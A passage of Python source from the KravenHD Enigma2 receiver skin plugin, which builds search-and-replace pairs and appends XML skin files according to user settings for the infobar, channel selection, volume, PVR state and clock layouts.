\"vposition0\":\n\t\t\t\tVPos_new = str(i)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition+1\":\n\t\t\t\tVPos_new = str(i +1)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition+2\":\n\t\t\t\tVPos_new = str(i +2)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition+3\":\n\t\t\t\tVPos_new = str(i +3)\n\n\t\t\tself.skinSearchAndReplace.append([',' + VPos_old + '\" name=\"KravenIconVPosition\"', ',' + VPos_new + '\"'])\n\n\t\t### delete Font-Shadow if Channelname is inside the box\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\" and config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\"):\n\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenNamebg\"', 'backgroundColor=\"KravenIBbg\"'])\n\n\t\t### Infobar - ecm-info\n\t\tif config.plugins.KravenHD.FTA.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['FTAVisible', 'FTAInvisible'])\n\n\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\tself.skinSearchAndReplace.append(['ShortReader', '' + config.plugins.KravenHD.ECMLine1.value])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.skinSearchAndReplace.append(['ShortReader', '' + config.plugins.KravenHD.ECMLine2.value])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\"):\n\t\t\tself.skinSearchAndReplace.append(['ShortReader', '' + config.plugins.KravenHD.ECMLine3.value])\n\n\t\t### Infobar typewriter effect\n\t\tif config.plugins.KravenHD.TypeWriter.value == \"runningtext\":\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDEmptyEpg\"', 
'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',' + config.plugins.KravenHD.RunningTextSpeed.value + ',wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDEmptyEpg\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',' + config.plugins.KravenHD.RunningTextSpeed2.value + ',wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\telif config.plugins.KravenHD.TypeWriter.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDEmptyEpg\"', 'render=\"KravenHDEmptyEpg2\"'])\n\n\t\t### Header begin\n\t\tself.appendSkinFile(self.data + \"header-begin.xml\")\n\n\t\t### Selection Border\n\t\tif config.plugins.KravenHD.SelectionStyle.value == \"color\" and not config.plugins.KravenHD.SelectionBorderList.value == \"none\":\n\t\t\tself.appendSkinFile(self.data + \"selectionborder.xml\")\n\t\t\tself.makeborsetpng(config.plugins.KravenHD.SelectionBorder.value)\n\n\t\t### Header end\n\t\tself.appendSkinFile(self.data + \"header-end.xml\")\n\n\t\t### Templates xml\n\t\tself.appendSkinFile(self.data + 'templates-main.xml')\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\tself.appendSkinFile(self.data + 'templates-mediaportal.xml')\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\"):\n\t\t\tself.appendSkinFile(self.data + 'templates-' + config.plugins.KravenHD.InfobarStyle.value + '.xml')\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.appendSkinFile(self.data + 'templates-infobar-style-x2-x3-z1-z2.xml')\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tself.appendSkinFile(self.data + 'templates-infobar-style-zz1-zzz1.xml')\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\tself.appendSkinFile(self.data + 'templates-infobar-style-zz2-zz3.xml')\n\n\t\t### ChannelSelection - horizontal RunningText\n\t\tif not self.BoxName == \"solo2\":\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=200\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=66,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=100\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=33,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=66\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=22,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == 
\"steptime=50\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=17,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=200\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=66,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=100\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=33,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=50\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=17,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=33\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=11,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDEmptyEpg2\"'])\n\n\t\t### ChannelSelection\n\t\tconfig.usage.servicelist_mode.value = \"standard\"\n\t\tconfig.usage.servicelist_mode.save()\n\t\tif self.actChannelselectionstyle in (\"channelselection-style-nopicon\", \"channelselection-style-nopicon2\", \"channelselection-style-xpicon\", \"channelselection-style-zpicon\", \"channelselection-style-zzpicon\", \"channelselection-style-zzzpicon\", \"channelselection-style-minitv3\", \"channelselection-style-nobile-minitv3\") or config.plugins.KravenHD.ChannelSelectionMode.value == \"zap\":\n\t\t\tconfig.usage.servicelistpreview_mode.value = False\n\t\telse:\n\t\t\tconfig.usage.servicelistpreview_mode.value = True\n\t\tconfig.usage.servicelistpreview_mode.save()\n\t\tif self.actChannelselectionstyle in (\"channelselection-style-minitv2\", \"channelselection-style-minitv22\"): #DualTV\n\t\t\tconfig.plugins.KravenHD.PigStyle.value = \"DualTV\"\n\t\t\tconfig.plugins.KravenHD.PigStyle.save()\n\t\telif self.actChannelselectionstyle in (\"channelselection-style-minitv33\", \"channelselection-style-nobile-minitv33\"): #ExtPreview\n\t\t\tconfig.plugins.KravenHD.PigStyle.value = \"ExtPreview\"\n\t\t\tconfig.plugins.KravenHD.PigStyle.save()\n\t\telif self.actChannelselectionstyle in (\"channelselection-style-minitv3\", \"channelselection-style-nobile-minitv3\"): #Preview\n\t\t\tconfig.plugins.KravenHD.PigStyle.value = \"Preview\"\n\t\t\tconfig.plugins.KravenHD.PigStyle.save()\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDPig3\"', 'render=\"Pig\"'])\n\t\tself.appendSkinFile(self.data + self.actChannelselectionstyle + \".xml\")\n\n\t\t### Infobar Clock\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif 
config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar Channelname\n\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-nopicon\" and not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\" and not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\") and not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-zz1\" and not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\") and not config.plugins.KravenHD.InfobarChannelName2.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-zzz1\" and not config.plugins.KravenHD.InfobarChannelName2.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar/SIB - ecm-info\n\t\tif config.plugins.KravenHD.ECMVisible.value in (\"ib\", \"ib+sib\"):\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\tif config.plugins.KravenHD.ECMVisible.value in (\"sib\", \"ib+sib\"):\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar weather-style\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x3\", \"infobar-style-z2\", \"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\"):\n\t\t\tself.actWeatherstyle = config.plugins.KravenHD.WeatherStyle.value\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", 
\"infobar-style-z1\"):\n\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/Netatmo/plugin.py\"):\n\t\t\t\tself.actWeatherstyle = config.plugins.KravenHD.WeatherStyle3.value\n\t\t\telse:\n\t\t\t\tself.actWeatherstyle = config.plugins.KravenHD.WeatherStyle2.value\n\n\t\tif self.actWeatherstyle == \"weather-small\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif self.actWeatherstyle == \"weather-left\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif self.actWeatherstyle == \"weather-big\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\tif config.plugins.KravenHD.refreshInterval.value == \"0\":\n\t\t\tconfig.plugins.KravenHD.refreshInterval.value = config.plugins.KravenHD.refreshInterval.default\n\t\t\tconfig.plugins.KravenHD.refreshInterval.save()\n\n\t\t### Infobar system-info\n\t\tif not config.plugins.KravenHD.SystemInfo.value == \"none\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar\n\t\t# mainstyles\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t# picon\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tif config.plugins.KravenHD.ShowAgcSnr.value == \"on\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t# tuners / some icons / Infobox\n\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-nopicon\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', 
''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.actInfobox = ''\n\t\t\tif config.plugins.KravenHD.ShowAgcSnr.value == \"on\":\n\t\t\t\tself.actInfobox = config.plugins.KravenHD.Infobox2.value\n\t\t\telse:\n\t\t\t\tself.actInfobox = config.plugins.KravenHD.Infobox.value\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### SecondInfobar\n\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Players clockstyle\n\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Volume\n\t\tself.skinSearchAndReplace.append(['', ''])\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.Volume.value == \"volume-left\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"47,38\" size=\"330,80\"', 'screen name=\"Volume\" position=\"10,130\" size=\"28,360\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-right\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"47,38\" size=\"330,80\"', 'screen name=\"Volume\" position=\"1240,130\" size=\"28,360\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-top\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"47,38\" size=\"330,80\"', 'screen name=\"Volume\" position=\"center,25\" size=\"400,28\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-center\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"47,38\" size=\"330,80\"', 'screen name=\"Volume\" position=\"548,286\" size=\"184,184\"'])\n\t\telse:\n\t\t\tif config.plugins.KravenHD.Volume.value == \"volume-left\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"70,57\" size=\"495,120\"', 'screen name=\"Volume\" position=\"15,195\" size=\"42,540\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-right\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"70,57\" size=\"495,120\"', 'screen name=\"Volume\" position=\"1860,195\" size=\"42,540\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-top\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"70,57\" size=\"495,120\"', 'screen name=\"Volume\" position=\"center,37\" size=\"600,42\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-center\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"70,57\" size=\"495,120\"', 'screen name=\"Volume\" position=\"868,448\" size=\"184,184\"'])\n\n\t\t### PVRState\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value in (\"gradient\", \"texture\") and not config.plugins.KravenHD.PVRState.value == \"pvrstate-off\":\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', 
''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tif not config.plugins.KravenHD.InfobarBoxColor.value in (\"gradient\", \"texture\") and not config.plugins.KravenHD.PVRState.value == \"pvrstate-off\":\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tif not config.plugins.KravenHD.PVRState.value == \"pvrstate-off\":\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\tif not config.plugins.KravenHD.PVRState.value == \"pvrstate-off\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"center,center\" size=\"220,90\"'])\n\t\t\t\telif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-small\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"center,center\" size=\"110,45\"'])\n\t\t\t\telif config.plugins.KravenHD.PVRState.value == \"pvrstate-left-small\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"30,20\" size=\"110,45\"'])\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"center,center\" size=\"330,135\"'])\n\t\t\t\telif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-small\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"center,center\" size=\"165,67\"'])\n\t\t\t\telif config.plugins.KravenHD.PVRState.value == \"pvrstate-left-small\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"45,30\" size=\"165,67\"'])\n\n\t\t### Main XML\n\t\tself.appendSkinFile(self.data + \"main.xml\")\n\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\t### Timeshift_begin\n\t\t\tself.appendSkinFile(self.data + \"timeshift-begin.xml\")\n\n\t\t\tif self.actWeatherstyle in (\"weather-big\", \"weather-left\"):\n\t\t\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-bigsat\":\n\t\t\t\t\tself.appendSkinFile(self.data + \"timeshift-begin-leftlow.xml\")\n\t\t\t\telse:\n\t\t\t\t\tself.appendSkinFile(self.data + \"timeshift-begin-low.xml\")\n\t\t\telif self.actWeatherstyle == \"weather-small\":\n\t\t\t\tself.appendSkinFile(self.data + \"timeshift-begin-left.xml\")\n\t\t\telse:\n\t\t\t\tself.appendSkinFile(self.data + \"timeshift-begin-high.xml\")\n\n\t\t\t### Timeshift_end\n\t\t\tself.appendSkinFile(self.data + \"timeshift-end.xml\")\n\n\t\t\t### InfobarTunerState\n\t\t\tif self.actWeatherstyle in (\"weather-big\", \"weather-left\", \"netatmobar\"):\n\t\t\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-bigsat\":\n\t\t\t\t\tself.appendSkinFile(self.data + 
\"infobartunerstate-low.xml\")\n\t\t\t\telse:\n\t\t\t\t\tself.appendSkinFile(self.data + \"infobartunerstate-mid.xml\")\n\t\t\telse:\n\t\t\t\tself.appendSkinFile(self.data + \"infobartunerstate-high.xml\")\n\n\t\telif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.appendSkinFile(self.data + \"timeshift-ibts-ar.xml\")\n\n\t\t### PermanentClock\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-infobar-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"80,20\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-global-big\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"Kravenbg\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-global-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"Kravenbg\" name=\"PermanentClockScreen\" size=\"80,20\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-transparent-big\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"transparent\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-transparent-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"', 'backgroundColor=\"transparent\" name=\"PermanentClockScreen\" size=\"80,20\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-infobar-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 'backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"120,30\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-global-big\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 'backgroundColor=\"Kravenbg\" name=\"PermanentClockScreen\" size=\"180,45\"'])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.PermanentClock.value == \"permanentclock-global-small\":\n\t\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenIBbg\" name=\"PermanentClockScreen\" size=\"180,45\"', 
